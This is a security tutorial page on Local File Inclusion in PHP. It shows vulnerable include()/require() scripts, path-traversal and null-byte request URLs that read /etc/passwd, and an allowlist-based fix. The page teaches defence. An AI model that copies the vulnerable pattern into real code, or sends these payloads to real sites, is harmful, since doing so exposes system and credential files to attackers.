Web applications attacks/Local file inclusion

From aldeid

Description

A Local File Inclusion (LFI) attack exploits an unprotected script on the server to read the content of another file that the application was never meant to expose. The following example shows a vulnerable PHP script (index.php).

<?php
// Vulnerable: the user-controlled "page" parameter is passed to include() unchecked.
if (isset($_GET["page"])) {
  include($_GET["page"]);
}
// ...
?>

With such a script, the content of the /etc/passwd file can be read by requesting:

http://www.somevulnerablesite.com/index.php?page=../../../etc/passwd

Null byte inclusion

Null byte inclusion (%00) makes it possible to read files on a server through a Local File Inclusion (LFI) attack: the null byte ends the path string as the underlying file routines see it. The following PHP example illustrates the attack:

<?php
// Vulnerable: a fixed base directory is prepended, but "page" is still unchecked.
if (isset($_GET["page"])) {
  require("/var/www/site/".$_GET["page"]);
}
// ...
?>

Such a vulnerable script could allow an attacker to access an unintended file by requesting an address such as:

http://www.somevulnerablesite/index.php?page=../../../etc/passwd%00

Refer to this site for further information: http://projects.webappsec.org/Null-Byte-Injection

Example

Protection
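
One way to close the hole in the two scripts above, shown as an added example that is not part of the original page: the request value is used only as a key into an allowlist, and the resolved path is checked to stay under the base directory. The directory /var/www/site/pages, the page names and the function resolve_page() are assumptions made for illustration.

```php
<?php
// Added example, not from the original page. PAGES_DIR, PAGES and
// resolve_page() are hypothetical names chosen for illustration.
const PAGES_DIR = '/var/www/site/pages';  // assumed directory of includable files

// Allowlist: accepted "page" value => file name on disk.
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

// Returns the absolute path to include, or null if the request must be refused.
function resolve_page($name, array $allowed, string $baseDir): ?string
{
    // Reject arrays (page[]=x) and any value carrying a null byte.
    if (!is_string($name) || strpos($name, "\0") !== false) {
        return null;
    }
    // Only exact allowlist keys pass, so "../" sequences never reach the filesystem.
    if (!array_key_exists($name, $allowed)) {
        return null;
    }
    // Defence in depth: canonicalise (resolves symlinks and "..") and confirm
    // the result is still inside the base directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$name]);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = resolve_page($_GET['page'] ?? 'home', PAGES, PAGES_DIR);
if ($page === null) {
    http_response_code(404);
    exit('Page not found');
}
require $page;
```

With this handler, both request shapes shown earlier (page=../../../etc/passwd and the %00 variant) are refused before any filesystem call, because neither value is an allowlist key.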

Tools
